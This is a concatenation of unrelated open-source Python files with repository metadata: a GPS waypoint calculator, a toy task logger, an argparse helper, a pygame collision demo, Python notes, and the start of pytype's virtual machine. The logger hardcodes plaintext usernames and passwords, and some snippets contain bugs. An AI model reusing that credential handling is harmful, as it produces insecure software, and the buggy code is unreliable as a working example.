"few_assignments": false,
"quality_score": 0.9386293020935607,
"avg_score": 0.02112327753879851,
"num_lines": 597
} |
#aaaa
import math
import time
import sys
from gps import Gps
def convert_image_location_to_waypoints( current_location, x_size, y_size, x_loc, y_loc): #altitude in meters
'''
creates triangular waypoints from a point in a rectangle and a current gps location
current_location is gps object
x_size, y_size, x_loc, y_loc are integers
'''
currentLat = current_location.get_lattitude()
currentLon = current_location.get_longtitude()
altitude = current_location.get_altitude()
hor_size,ver_size = fov(2.8,5,4.28,5.7,altitude) #goPro hd hero specs
speed = 1
x_median = x_size/2
y_median = y_size/2
# print 'center: ', x_median,',', y_median
x_diff = x_loc - x_median
y_diff = y_loc - y_median
hor_diff = realx(x_size,x_diff,hor_size)
ver_diff = realy(y_size,y_diff,ver_size)
# print 'horver diff', hor_diff, ver_diff
horFollower1,verFollower1 = follower(hor_diff,ver_diff,altitude, 0)
horFollower2,verFollower2 = follower(hor_diff,ver_diff,altitude,1)
lat1,lon1 = offset(currentLat,currentLon,hor_diff,ver_diff)
lat2,lon2 = offset(currentLat,currentLon,horFollower1,verFollower1)
lat3,lon3 = offset(currentLat,currentLon,horFollower2,verFollower2)
alpha = Gps( lat1, lon1)
side1 = Gps( lat2, lon2)
side2 = Gps( lat3, lon3)
return (alpha, side1, side2)
def realx(x_size,x_diff,hor_size):
return (x_diff*hor_size)/x_size
def realy(y_size,y_diff,ver_size):
return (y_diff*ver_size)/y_size
def fov(N,f,h,v,alt): #N:focal number, f:focal dist, h-v: sensor size hor/ver, alt:altitude
D=f/N
h_angle=2*math.atan2(h,2*f)
v_angle=2*math.atan2(v,2*f)
hor = math.tan(h_angle)*alt
ver = math.tan(v_angle)*alt
return (hor,ver)
def offset(lat,lon,hor_diff,ver_diff):
R=6378137 #earth's radius
newLat = lat + (hor_diff/R)*180/math.pi
newLon = lon + (ver_diff/(R*math.cos(math.pi*lat/180))*(180/math.pi))
return (newLat, newLon)
def follower(x,y,alt,fnum): #target coordinates, altitude, fnum: 0 if first follower, 1 if second
if(alt<50):
alt = 50
r,deg = polar(x,y)
opp = alt/4.0
adj = r-alt*math.sqrt(3.0)/4.0
theta = 180.0*math.atan2(adj,opp)
r2d2 = math.sqrt(opp**2 + adj**2)
if fnum:
ang = deg + theta
else:
ang = deg - theta
return rect(r2d2, ang)
def rect(r, w):
w = math.pi * w / 180.0
return r * math.cos(w), r * math.sin(w)
def polar(x, y):
return math.hypot(x, y), 180.0*math.atan2(y, x)/math.pi
if __name__ == "__main__":
print convert_image_location_to_waypoints(640,480,323,244)
| {
"repo_name": "alpsayin/python-gps",
"path": "waypoint_calculator.py",
"copies": "1",
"size": "2541",
"license": "mit",
"hash": -6527666918374419000,
"line_mean": 27.8863636364,
"line_max": 109,
"alpha_frac": 0.6654860291,
"autogenerated": false,
"ratio": 2.5384615384615383,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8246749976616962,
"avg_score": 0.09143951818891538,
"num_lines": 88
} |
#aaaa
import getpass
import datetime
def tool(n):
namelist = ['osman','mahmut','sarpulas']
pwlist = ['namso','tumham','salupras']
username = raw_input('Enter username:\n')
print "uname: ", username;
if username in namelist:
i = namelist.index(username)
pw = getpass.getpass(prompt='Enter password:\n')
if pw == pwlist[int(i)]:
print('password correct')
openlist(username)
else:
print('FAIL')
else:
print('NAME NOT FOUND')
def openlist(username):
f=open('log.txt','r')
try:
for line in f:
print line
finally:
f.close()
input = raw_input('Write task title if you want to add a new tast. Write \'exit\' to quit\n')
if input == 'exit':
print('quitting...')
else:
newtask(username,input)
def newtask(username, input):
taskdesc = raw_input('Input task description:\n')
f = open('log.txt', 'a')
f.write('\n'+username +' | '+ datetime.datetime.__str__(datetime.datetime.now())+' | '+ input +' | '+ taskdesc);
f.close
print('task: \''+input+'\' added')
openlist(username)
if __name__ == "__main__":
import sys
tool(1) | {
"repo_name": "sarpulas/idLog",
"path": "aaa.py",
"copies": "1",
"size": "1158",
"license": "mit",
"hash": -5506614869902112000,
"line_mean": 23.6595744681,
"line_max": 114,
"alpha_frac": 0.5898100173,
"autogenerated": false,
"ratio": 3.376093294460641,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9133897088689905,
"avg_score": 0.06640124461414736,
"num_lines": 47
} |
# Aaargh 0.4
# Taken from https://github.com/wbolster/aaargh
# BSD License per setup.py
"""
Aaargh, an astonishingly awesome application argument helper
"""
from argparse import ArgumentParser
_NO_FUNC = object()
__all__ = ['App', '__version__']
# XXX: Keep version number in sync with setup.py
__version__ = '0.4'
class App(object):
"""
Simple command line application.
Constructor arguments are propagated to :py:class:`ArgumentParser`.
"""
def __init__(self, *args, **kwargs):
self._parser = ArgumentParser(*args, **kwargs)
self._global_args = []
self._subparsers = self._parser.add_subparsers(title="Subcommands")
self._pending_args = []
self._defaults = {}
def arg(self, *args, **kwargs):
"""Add a global application argument.
All arguments are passed on to :py:meth:`ArgumentParser.add_argument`.
"""
self._global_args.append((args, kwargs))
return self._parser.add_argument(*args, **kwargs)
def defaults(self, **kwargs):
"""Set global defaults.
All arguments are passed on to :py:meth:`ArgumentParser.set_defaults`.
"""
return self._parser.set_defaults(**kwargs)
def cmd(self, _func=_NO_FUNC, name=None, *args, **kwargs):
"""Decorator to create a command line subcommand for a function.
By default, the name of the decorated function is used as the
name of the subcommand, but this can be overridden by specifying the
`name` argument. Additional arguments are passed to the subcommand's
:py:class:`ArgumentParser`.
"""
if _func is not _NO_FUNC:
# Support for using this decorator without calling it, e.g.
# @app.cmd <---- note: no parentheses here!
# def foo(): pass
return self.cmd()(_func)
parser_args = args
parser_kwargs = kwargs
def wrapper(func):
subcommand = name if name is not None else func.__name__
parser_kwargs.setdefault('help', "") # improves --help output
subparser = self._subparsers.add_parser(
subcommand, *parser_args, **parser_kwargs)
# Add global arguments to subcommand as well so that they
# can be given after the subcommand on the CLI.
for global_args, global_kwargs in self._global_args:
subparser.add_argument(*global_args, **global_kwargs)
# Add any pending arguments
for args, kwargs in self._pending_args:
subparser.add_argument(*args, **kwargs)
self._pending_args = []
# Add any pending default values
try:
pending_defaults = self._defaults.pop(None)
except KeyError:
pass # no pending defaults
else:
self._defaults[func] = pending_defaults
# Store callback function and return the decorated function
# unmodified
subparser.set_defaults(_func=func)
return func
return wrapper
def cmd_arg(self, *args, **kwargs):
"""Decorator to specify a command line argument for a subcommand.
All arguments are passed on to :py:meth:`ArgumentParser.add_argument`.
Note: this function must be used in conjunction with .cmd().
"""
# TODO: perhaps add a 'group' argument to cmd_arg() that
# translates to add_argument_group
if len(args) == 1 and callable(args[0]) and not kwargs:
raise TypeError("cmd_arg() decorator requires arguments, "
"but none were supplied")
# Remember the passed args, since the command is not yet known
# when this decorator is called.
self._pending_args.append((args, kwargs))
# Return a do-nothing decorator
return lambda func: func
def cmd_defaults(self, **kwargs):
"""Decorator to specify defaults for a subcommand.
This can be useful to override global argument defaults for specific
subcommands.
All arguments are passed on to :py:meth:`ArgumentParser.set_defaults`.
Note: this function must be used in conjunction with .cmd().
"""
if len(kwargs) == 1 and callable(list(kwargs.values())[0]):
raise TypeError("defaults() decorator requires arguments, "
"but none were supplied")
# Work-around http://bugs.python.org/issue9351 by storing the
# defaults outside the ArgumentParser. The special key "None" is
# used for the pending defaults for a yet-to-be defined command.
self._defaults[None] = kwargs
return lambda func: func
def run(self, *args, **kwargs):
"""Run the application.
This method parses the arguments and takes the appropriate actions. If
a valid subcommand was found, it will be executed and its return value
will be returned.
All arguments are passed on to :py:meth:`ArgumentParser.parse_args`.
"""
if self._pending_args:
raise TypeError("cmd_arg() called without matching cmd()")
if None in self._defaults:
raise TypeError("cmd_defaults() called without matching cmd()")
kwargs = vars(self._parser.parse_args(*args, **kwargs))
func = kwargs.pop('_func')
if func in self._defaults:
kwargs.update(self._defaults[func])
return func(**kwargs) | {
"repo_name": "splunk/splunk-webframework",
"path": "contrib/aaargh/aaargh.py",
"copies": "1",
"size": "5564",
"license": "apache-2.0",
"hash": -5328062065047802000,
"line_mean": 33.5652173913,
"line_max": 78,
"alpha_frac": 0.6035226456,
"autogenerated": false,
"ratio": 4.523577235772358,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00021417862497322766,
"num_lines": 161
} |
# AABB collision example
# KidsCanCode 2016
import pygame as pg
vec = pg.math.Vector2
WIDTH = 800
HEIGHT = 600
FPS = 60
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0, 128)
GREEN = (0, 255, 0, 128)
CYAN = (0, 255, 255, 128)
YELLOW = (255, 255, 0)
LIGHTGRAY = (150, 150, 150)
DARKGRAY = (40, 40, 40)
def draw_text(text, size, color, x, y, align="nw"):
font_name = pg.font.match_font('hack')
font = pg.font.Font(font_name, size)
text_surface = font.render(text, True, color)
text_rect = text_surface.get_rect()
if align == "nw":
text_rect.topleft = (x, y)
if align == "ne":
text_rect.topright = (x, y)
if align == "sw":
text_rect.bottomleft = (x, y)
if align == "se":
text_rect.bottomright = (x, y)
if align == "n":
text_rect.midtop = (x, y)
if align == "s":
text_rect.midbottom = (x, y)
if align == "e":
text_rect.midright = (x, y)
if align == "w":
text_rect.midleft = (x, y)
if align == "center":
text_rect.center = (x, y)
screen.blit(text_surface, text_rect)
pg.init()
screen = pg.display.set_mode((WIDTH, HEIGHT))
pg.display.set_caption("AABB Collisions")
clock = pg.time.Clock()
p = pg.Rect(0, 0, 150, 150)
p.center = (WIDTH / 3, HEIGHT / 3)
m_r = pg.Rect(0, 0, 100, 100)
m = pg.Surface((100, 100)).convert_alpha()
col = GREEN
msg = ""
running = True
while running:
clock.tick(FPS)
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
if event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
running = False
m_r.center = (pg.mouse.get_pos())
in_x = m_r.left < p.right and m_r.right > p.left
in_y = m_r.top < p.bottom and m_r.bottom > p.top
if in_x and in_y:
# col = RED
m.fill(RED)
msg = "Colliding!"
elif in_x or in_y:
# col = CYAN
m.fill(CYAN)
msg = "Not colliding"
else:
# col = GREEN
m.fill(GREEN)
msg = "Not colliding"
screen.fill(DARKGRAY)
pg.draw.line(screen, LIGHTGRAY, (p.left, p.bottom + 5), (p.left, HEIGHT), 2)
pg.draw.line(screen, LIGHTGRAY, (p.right, p.bottom + 5), (p.right, HEIGHT), 2)
pg.draw.line(screen, LIGHTGRAY, (p.right + 5, p.top), (WIDTH, p.top), 2)
pg.draw.line(screen, LIGHTGRAY, (p.right + 5, p.bottom), (WIDTH, p.bottom), 2)
pg.draw.rect(screen, YELLOW, p)
# pg.draw.rect(screen, col, m)
screen.blit(m, m_r)
draw_text(msg, 22, WHITE, 15, 15)
draw_text("left", 18, WHITE, p.left - 5, HEIGHT - 5, align="se")
draw_text("right", 18, WHITE, p.right + 5, HEIGHT - 5, align="sw")
draw_text("top", 18, WHITE, WIDTH - 5, p.top - 5, align="se")
draw_text("bottom", 18, WHITE, WIDTH - 5, p.bottom + 5, align="ne")
draw_text(str(m_r), 20, col, WIDTH / 2, 15, align="nw")
pg.display.flip()
| {
"repo_name": "kidscancode/gamedev",
"path": "tutorials/examples/aabb example.py",
"copies": "1",
"size": "2898",
"license": "mit",
"hash": 890904721168602800,
"line_mean": 28.8762886598,
"line_max": 82,
"alpha_frac": 0.5600414079,
"autogenerated": false,
"ratio": 2.670967741935484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37310091498354836,
"avg_score": null,
"num_lines": null
} |
>>> a = ['a', 'b', 'c', 'd', 'e']
>>> for index, item in enumerate(a): print index, item # enumerate function will generate an index for the item + item it self.
...
0 a
1 b
2 c
3 d
4 e
#convert a list to string:
list1 = ['1', '2', '3']
str1 = ''.join(list1)
Or if the list is of integers, convert the elements before joining them.
list1 = [1, 2, 3]
str1 = ''.join(str(e) for e in list1)
#FIND method
str.find(str2, beg=0 end=len(string))
Parameters
str2 -- This specifies the string to be searched.
beg -- This is the starting index, by default its 0.
end -- This is the ending index, by default its equal to the lenght of the string.
Return Value
This method returns index if found and -1 otherwise.
str1 = "this is string example....wow!!!";
str2 = "exam";
# find function will print the position for the first character of the string if it's found!
print str1.find(str2);
print str1.find(str2, 10);
print str1.find(str2, 40);
#15
#15
#-1
#2D LIST PYTHON
# Creates a list containing 5 lists initialized to 0
Matrix = [[0 for x in range(5)] for x in range(5)]
You can now add items to the list:
Matrix[0][0] = 1
Matrix[4][0] = 5
print Matrix[0][0] # prints 1
print Matrix[4][0] # prints 5
if you have a simple two-dimensional list like this:
A = [[1,2,3,4],
[5,6,7,8]]
then you can extract a column like this:
def column(matrix, i):
return [row[i] for row in matrix]
Extracting the second column (index 1):
>>> column(A, 1)
[2, 6]
Or alternatively, simply:
>>> [row[1] for row in A]
[2, 6]
| {
"repo_name": "ujjwalkarn/DataSciencePython",
"path": "basic_commands.py",
"copies": "1",
"size": "1533",
"license": "mit",
"hash": 7758785390209645000,
"line_mean": 17.9259259259,
"line_max": 128,
"alpha_frac": 0.6614481409,
"autogenerated": false,
"ratio": 2.8654205607476637,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40268687016476634,
"avg_score": null,
"num_lines": null
} |
"""A abstract virtual machine for python bytecode that generates typegraphs.
A VM for python byte code that uses pytype/pytd/cfg ("typegraph") to generate a
trace of the program execution.
"""
# We have names like "byte_NOP":
# pylint: disable=invalid-name
# Bytecodes don't always use all their arguments:
# pylint: disable=unused-argument
import collections
import linecache
import logging
import re
import repr as reprlib
import sys
import types
from pytype import abstract
from pytype import blocks
from pytype import exceptions
from pytype import load_pytd
from pytype import state as frame_state
from pytype import utils
from pytype.pyc import loadmarshal
from pytype.pyc import pyc
from pytype.pytd import cfg as typegraph
from pytype.pytd import pytd
from pytype.pytd import slots
from pytype.pytd import utils as pytd_utils
from pytype.pytd.parse import builtins
log = logging.getLogger(__name__)
MAX_IMPORT_DEPTH = 12
# Create a repr that won't overflow.
_TRUNCATE = 120
_TRUNCATE_STR = 72
repr_obj = reprlib.Repr()
repr_obj.maxother = _TRUNCATE
repr_obj.maxstring = _TRUNCATE_STR
repper = repr_obj.repr
Block = collections.namedtuple("Block", ["type", "handler", "level"])
class ConversionError(ValueError):
pass
class RecursionException(Exception):
pass
def _get_atomic_value(variable):
values = variable.values
if len(values) == 1:
return values[0].data
else:
raise ConversionError(
"Variable with too many options when trying to get atomic value. %s %s"
% (variable, [a.data for a in values]))
def _get_atomic_python_constant(variable):
"""Get the concrete atomic Python value stored in this variable.
This is used for things that are stored in typegraph.Variable, but we
need the actual data in order to proceed. E.g. function / class defintions.
Args:
variable: A typegraph.Variable. It can only have one possible value.
Returns:
A Python constant. (Typically, a string, a tuple, or a code object.)
Raises:
ValueError: If the value in this Variable is purely abstract, i.e. doesn't
store a Python value.
IndexError: If there is more than one possibility for this value.
"""
atomic = _get_atomic_value(variable)
if isinstance(atomic, abstract.PythonConstant):
return atomic.pyval
raise ConversionError("Only some types are supported: %r" % type(atomic))
class VirtualMachineError(Exception):
"""For raising errors in the operation of the VM."""
pass
class VirtualMachine(object):
"""A bytecode VM that generates a typegraph as it executes.
Attributes:
program: The typegraph.Program used to build the typegraph.
root_cfg_node: The root CFG node that contains the definitions of builtins.
primitive_classes: A mapping from primitive python types to their abstract
types.
"""
def __init__(self, python_version,
module_name=None,
reverse_operators=False,
cache_unknowns=True,
pythonpath=(),
find_pytd_import_ext=".pytd",
import_drop_prefixes=(),
pybuiltins_filename=None,
skip_repeat_calls=True):
"""Construct a TypegraphVirtualMachine."""
self.python_version = python_version
self.pybuiltins_filename = pybuiltins_filename
self.reverse_operators = reverse_operators
self.cache_unknowns = cache_unknowns
self.loader = load_pytd.Loader(base_module=module_name,
python_version=python_version,
pythonpath=pythonpath,
find_pytd_import_ext=find_pytd_import_ext,
import_drop_prefixes=import_drop_prefixes)
self.skip_repeat_calls = skip_repeat_calls
# The call stack of frames.
self.frames = []
# The current frame.
self.frame = None
self.return_value = None
self.program = typegraph.Program()
self.root_cfg_node = self.program.NewCFGNode("root")
self.program.entrypoint = self.root_cfg_node
self._convert_cache = {}
# Initialize primitive_classes to empty to allow convert_constant to run
self.primitive_classes = {}
# Now fill primitive_classes with the real values using convert_constant
self.primitive_classes = {v: self.convert_constant(v.__name__, v)
for v in [int, long, float, str, unicode,
types.NoneType, complex, bool, slice,
types.CodeType]}
self.none = abstract.AbstractOrConcreteValue(
None, self.primitive_classes[types.NoneType], self)
self.true = abstract.AbstractOrConcreteValue(
True, self.primitive_classes[bool], self)
self.false = abstract.AbstractOrConcreteValue(
False, self.primitive_classes[bool], self)
self.nothing = abstract.Nothing(self)
self.unsolvable = abstract.Unsolvable(self)
self.primitive_class_instances = {}
for name, clsvar in self.primitive_classes.items():
instance = abstract.Instance(clsvar, self)
self.primitive_class_instances[name] = instance
clsval, = clsvar.values
self._convert_cache[(abstract.Instance, clsval.data.pytd_cls)] = instance
self.primitive_class_instances[types.NoneType] = self.none
self.str_type = self.primitive_classes[str]
self.int_type = self.primitive_classes[int]
self.tuple_type = self.convert_constant("tuple", tuple)
self.list_type = self.convert_constant("list", list)
self.set_type = self.convert_constant("set", set)
self.dict_type = self.convert_constant("dict", dict)
self.function_type = self.convert_constant("function type",
types.FunctionType)
self.vmbuiltins = {b.name: b for b in (self.loader.builtins.constants +
self.loader.builtins.classes +
self.loader.builtins.functions)}
def run_instruction(self, op, state):
"""Run a single bytecode instruction.
Args:
op: An opcode, instance of pyc.opcodes.Opcode
state: An instance of state.FrameState, the state just before running
this instruction.
Returns:
A tuple (why, state). "why" is the reason (if any) that this opcode aborts
this function (e.g. through a 'raise'), or None otherwise. "state" is the
FrameState right after this instruction that should roll over to the
subsequent instruction.
"""
if log.isEnabledFor(logging.INFO):
self.log_opcode(op, state)
self.frame.current_opcode = op
try:
# dispatch
bytecode_fn = getattr(self, "byte_%s" % op.name, None)
if bytecode_fn is None:
raise VirtualMachineError("Unknown opcode: %s" % op.name)
if op.has_arg():
state = bytecode_fn(state, op)
else:
state = bytecode_fn(state)
except StopIteration:
# TODO(kramm): Use abstract types for this.
state = state.set_exception(
sys.exc_info()[0], sys.exc_info()[1], None)
state = state.set_why("exception")
except RecursionException as e:
# This is not an error - it just means that the block we're analyzing
# goes into a recursion, and we're already two levels deep.
state = state.set_why("recursion")
except exceptions.ByteCodeException:
e = sys.exc_info()[1]
state = state.set_exception(
e.exception_type, e.create_instance(), None)
# TODO(pludemann): capture exceptions that are indicative of
# a bug (AttributeError?)
log.info("Exception in program: %s: %r",
e.exception_type.__name__, e.message)
state = state.set_why("exception")
if state.why == "reraise":
state = state.set_why("exception")
del self.frame.current_opcode
return state
def join_cfg_nodes(self, nodes):
assert nodes
if len(nodes) == 1:
return nodes[0]
else:
ret = self.program.NewCFGNode()
for node in nodes:
node.ConnectTo(ret)
return ret
def run_frame(self, frame, node):
"""Run a frame (typically belonging to a method)."""
self.push_frame(frame)
frame.states[frame.f_code.co_code[0]] = frame_state.FrameState.init(node)
return_nodes = []
for block in frame.f_code.order:
state = frame.states.get(block[0])
if not state:
log.error("Skipping block %d,"
" we don't have any non-erroneous code that goes here.",
block.id)
continue
op = None
for op in block:
state = self.run_instruction(op, state)
if state.why:
# we can't process this block any further
break
if state.why in ["return", "yield"]:
return_nodes.append(state.node)
if not state.why and op.carry_on_to_next():
frame.states[op.next] = state.merge_into(frame.states.get(op.next))
self.pop_frame(frame)
if not return_nodes:
# Happens if all the function does is to throw an exception.
# (E.g. "def f(): raise NoImplemented")
# TODO(kramm): Return the exceptions, too.
return node, frame.return_variable
return self.join_cfg_nodes(return_nodes), frame.return_variable
reversable_operators = set([
"__add__", "__sub__", "__mul__",
"__div__", "__truediv__", "__floordiv__",
"__mod__", "__divmod__", "__pow__",
"__lshift__", "__rshift__", "__and__", "__or__", "__xor__"
])
@staticmethod
def reverse_operator_name(name):
if name in VirtualMachine.reversable_operators:
return "__r" + name[2:]
return None
def push_block(self, state, t, handler=None, level=None):
if level is None:
level = len(state.data_stack)
return state.push_block(Block(t, handler, level))
def push_frame(self, frame):
self.frames.append(frame)
self.frame = frame
def pop_frame(self, frame):
popped_frame = self.frames.pop()
assert popped_frame == frame
if self.frames:
self.frame = self.frames[-1]
else:
self.frame = None
def print_frames(self):
"""Print the call stack, for debugging."""
for f in self.frames:
filename = f.f_code.co_filename
lineno = f.line_number()
print ' File "%s", line %d, in %s' % (filename, lineno, f.f_code.co_name)
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
if line:
print " " + line.strip()
def unwind_block(self, block, state):
"""Adjusts the data stack to account for removing the passed block."""
if block.type == "except-handler":
offset = 3
else:
offset = 0
while len(state.data_stack) > block.level + offset:
state = state.pop_and_discard()
if block.type == "except-handler":
state, (tb, value, exctype) = state.popn(3)
state = state.set_exception(exctype, value, tb)
return state
def log_opcode(self, op, state):
"""Write a multi-line log message, including backtrace and stack."""
if not log.isEnabledFor(logging.INFO):
return
indent = " > " * (len(self.frames) - 1)
stack_rep = repper(state.data_stack)
block_stack_rep = repper(state.block_stack)
# TODO(pludemann): nicer module/file name:
if self.frame.f_code.co_filename:
module_name = ".".join(re.sub(
r"\.py$", "", self.frame.f_code.co_filename).split("/")[-2:])
name = self.frame.f_code.co_name
log.info("%s | index: %d, %r, module: %s line: %d",
indent, op.index, name, module_name, op.line)
else:
log.info("%s | index: %d, line: %d",
indent, op.index, op.line)
log.info("%s | data_stack: %s", indent, stack_rep)
log.info("%s | block_stack: %s", indent, block_stack_rep)
log.info("%s | node: <%d>%s", indent, state.node.id, state.node.name)
arg = op.pretty_arg if op.has_arg() else ""
op = "%d: %s %s" % (op.index, op.name,
utils.maybe_truncate(arg, _TRUNCATE))
log.info("%s %s", indent, op)
def repper(self, s):
return repr_obj.repr(s)
# Operators
def pop_slice_and_obj(self, state, count):
"""Pop a slice from the data stack. Used by slice opcodes (SLICE_0 etc.)."""
start = 0
end = None # we will take this to mean end
if count == 1:
state, start = state.pop()
elif count == 2:
state, end = state.pop()
elif count == 3:
state, end = state.pop()
state, start = state.pop()
state, obj = state.pop()
if end is None:
# Note that Python only calls __len__ if we have a negative index, not if
# we omit the index. Since we can't tell whether an index is negative
# (it might be an abstract integer, or a union type), we just always
# call __len__.
state, f = self.load_attr(state, obj, "__len__")
state, end = self.call_function_with_state(state, f, [], {})
return state, self.build_slice(state.node, start, end, 1), obj
def store_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, new_value = state.pop()
state, f = self.load_attr(state, obj, "__setitem__")
state, _ = self.call_function_with_state(state, f, [slice_obj, new_value],
{})
return state
def delete_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, f = self.load_attr(state, obj, "__delitem__")
state, _ = self.call_function_with_state(state, f, [slice_obj], {})
return state
def get_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, f = self.load_attr(state, obj, "__getitem__")
state, ret = self.call_function_with_state(state, f, [slice_obj], {})
return state.push(ret)
def do_raise(self, state, exc, cause):
"""Raise an exception. Used by byte_RAISE_VARARGS."""
if exc is None: # reraise
exc_type, val, _ = state.last_exception
if exc_type is None:
return state.set_why("exception")
else:
return state.set_why("reraise")
elif type(exc) == type:
# As in `raise ValueError`
exc_type = exc
val = exc() # Make an instance.
elif isinstance(exc, BaseException):
# As in `raise ValueError('foo')`
exc_type = type(exc)
val = exc
else:
return state
# If you reach this point, you're guaranteed that
# val is a valid exception instance and exc_type is its class.
# Now do a similar thing for the cause, if present.
if cause:
if type(cause) == type:
cause = cause()
elif not isinstance(cause, BaseException):
return state
val.__cause__ = cause
state.set_exception(exc_type, val, val.__traceback__)
return state
# Importing
def join_variables(self, node, name, variables):
"""Create a combined Variable for a list of variables.
This is destructive: It will reuse and overwrite the input variables. The
purpose of this function is to create a final result variable for functions
that return a list of "temporary" variables. (E.g. function calls)
Args:
node: The current CFG node.
name: Name of the new variable.
variables: List of variables.
Returns:
A typegraph.Variable.
"""
if not variables:
return self.program.NewVariable(name) # return empty var
elif len(variables) == 1:
v, = variables
return v
else:
v = self.program.NewVariable(name)
for r in variables:
v.PasteVariable(r, node)
return v
def convert_value_to_string(self, val):
if isinstance(val, abstract.PythonConstant) and isinstance(val.pyval, str):
return val.pyval
raise ConversionError("%s is not a string" % val)
def _get_maybe_abstract_instance(self, data):
"""Get an instance of the same type as the given data, abstract if possible.
Get an abstract instance of primitive data stored as an
AbstractOrConcreteValue. Return any other data as-is. This is used by
create_pytd_instance to discard concrete values that have been kept
around for InterpreterFunction.
Arguments:
data: The data.
Returns:
An instance of the same type as the data, abstract if possible.
"""
if isinstance(data, abstract.AbstractOrConcreteValue):
data_type = type(data.pyval)
if data_type in self.primitive_class_instances:
return self.primitive_class_instances[data_type]
return data
def create_pytd_instance(self, name, pytype, subst, node, source_sets=None,
discard_concrete_values=False):
"""Create an instance of a PyTD type as a typegraph.Variable.
Because this (unlike create_pytd_instance_value) creates variables, it can
also handle union types.
Args:
name: What to call the resulting variable.
pytype: A PyTD type to construct an instance of.
subst: The current type parameters.
node: The current CFG node.
source_sets: An iterator over instances of SourceSet (or just tuples).
Each SourceSet describes a combination of values that were used to
build the new value (e.g., for a function call, parameter types).
discard_concrete_values: Whether concrete values should be discarded from
type parameters.
Returns:
A typegraph.Variable.
Raises:
ValueError: If we can't resolve a type parameter.
"""
if not source_sets:
source_sets = [[]]
if isinstance(pytype, pytd.AnythingType):
return self.create_new_unknown(node, "?")
name = pytype.name if hasattr(pytype, "name") else pytype.__class__.__name__
var = self.program.NewVariable(name)
for t in pytd_utils.UnpackUnion(pytype):
if isinstance(t, pytd.TypeParameter):
if not subst or t.name not in subst:
raise ValueError("Can't resolve type parameter %s using %r" % (
t.name, subst))
for v in subst[t.name].values:
for source_set in source_sets:
var.AddValue(self._get_maybe_abstract_instance(v.data)
if discard_concrete_values else v.data,
source_set + [v], node)
elif isinstance(t, pytd.NothingType):
pass
else:
value = self._create_pytd_instance_value(name, t, subst, node)
for source_set in source_sets:
var.AddValue(value, source_set, node)
return var
def _create_pytd_instance_value(self, name, pytype, subst, node):
"""Create an instance of PyTD type.
This can handle any PyTD type and is used for generating both methods of
classes (when given a Signature) and instance of classes (when given a
ClassType).
Args:
name: What to call the value.
pytype: A PyTD type to construct an instance of.
subst: The current type parameters.
node: The current CFG node.
Returns:
An instance of AtomicAbstractType.
Raises:
ValueError: if pytype is not of a known type.
"""
if isinstance(pytype, pytd.ClassType):
# This key is also used in __init__
key = (abstract.Instance, pytype.cls)
if key not in self._convert_cache:
if pytype.name == "type":
# special case: An instantiation of "type" can be anything.
instance = self._create_new_unknown_value("type")
else:
instance = abstract.Instance(
self.convert_constant(str(pytype), pytype), self)
log.info("New pytd instance for %s: %r", pytype.cls.name, instance)
self._convert_cache[key] = instance
return self._convert_cache[key]
elif isinstance(pytype, pytd.GenericType):
assert isinstance(pytype.base_type, pytd.ClassType)
cls = pytype.base_type.cls
instance = abstract.Instance(
self.convert_constant(cls.name, cls), self)
for formal, actual in zip(cls.template, pytype.parameters):
p = self.create_pytd_instance(repr(formal), actual, subst, node)
instance.initialize_type_parameter(node, formal.name, p)
return instance
else:
return self.convert_constant_to_value(name, pytype)
def _create_new_unknown_value(self, action):
if not self.cache_unknowns or not action or not self.frame:
return abstract.Unknown(self)
# We allow only one Unknown at each point in the program, regardless of
# what the call stack is.
key = ("unknown", self.frame.current_opcode, action)
if key not in self._convert_cache:
self._convert_cache[key] = abstract.Unknown(self)
return self._convert_cache[key]
def create_new_unknown(self, node, name, source=None, action=None):
"""Create a new variable containing unknown, originating from this one."""
unknown = self._create_new_unknown_value(action)
v = self.program.NewVariable(name)
val = v.AddValue(unknown, source_set=[source] if source else [], where=node)
unknown.owner = val
self.trace_unknown(unknown.class_name, v)
return v
def create_new_unsolvable(self, node, name):
"""Create a new variable containing an unsolvable."""
return self.unsolvable.to_variable(node, name)
def convert_constant(self, name, pyval):
"""Convert a constant to a Variable.
This converts a constant to a typegraph.Variable. Unlike
convert_constant_to_value, it can handle things that need to be represented
as a Variable with multiple possible values (i.e., a union type), like
pytd.Function.
Args:
name: The name to give the new variable.
pyval: The Python constant to convert. Can be a PyTD definition or a
builtin constant.
Returns:
A typegraph.Variable.
Raises:
ValueError: if pytype is not of a known type.
"""
if isinstance(pyval, pytd.UnionType):
options = [self.convert_constant_to_value(pytd.Print(t), t)
for t in pyval.type_list]
return self.program.NewVariable(name, options, [], self.root_cfg_node)
elif isinstance(pyval, pytd.NothingType):
return self.program.NewVariable(name, [], [], self.root_cfg_node)
elif isinstance(pyval, pytd.Constant):
return self.create_pytd_instance(name, pyval.type, {}, self.root_cfg_node)
result = self.convert_constant_to_value(name, pyval)
if result is not None:
return result.to_variable(self.root_cfg_node, name)
# There might still be bugs on the abstract intepreter when it returns,
# e.g. a list of values instead of a list of types:
assert pyval.__class__ != typegraph.Variable, pyval
if pyval.__class__ == tuple:
# TODO(ampere): This does not allow subclasses. Handle namedtuple
# correctly.
# This case needs to go at the end because many things are actually also
# tuples.
return self.build_tuple(
self.root_cfg_node,
(self.maybe_convert_constant("tuple[%d]" % i, v)
for i, v in enumerate(pyval)))
raise ValueError(
"Cannot convert {} to an abstract value".format(pyval.__class__))
def convert_constant_to_value(self, name, pyval):
# We don't memoize on name, as builtin types like str or list might be
# reinitialized under different names (e.g. "param 1"), but we want the
# canonical name and type.
# We *do* memoize on the type as well, to make sure that e.g. "1.0" and
# "1" get converted to different constants.
# Memoization is an optimization, but an important one- mapping constants
# like "None" to the same AbstractValue greatly simplifies the typegraph
# structures we're building.
key = ("constant", pyval, type(pyval))
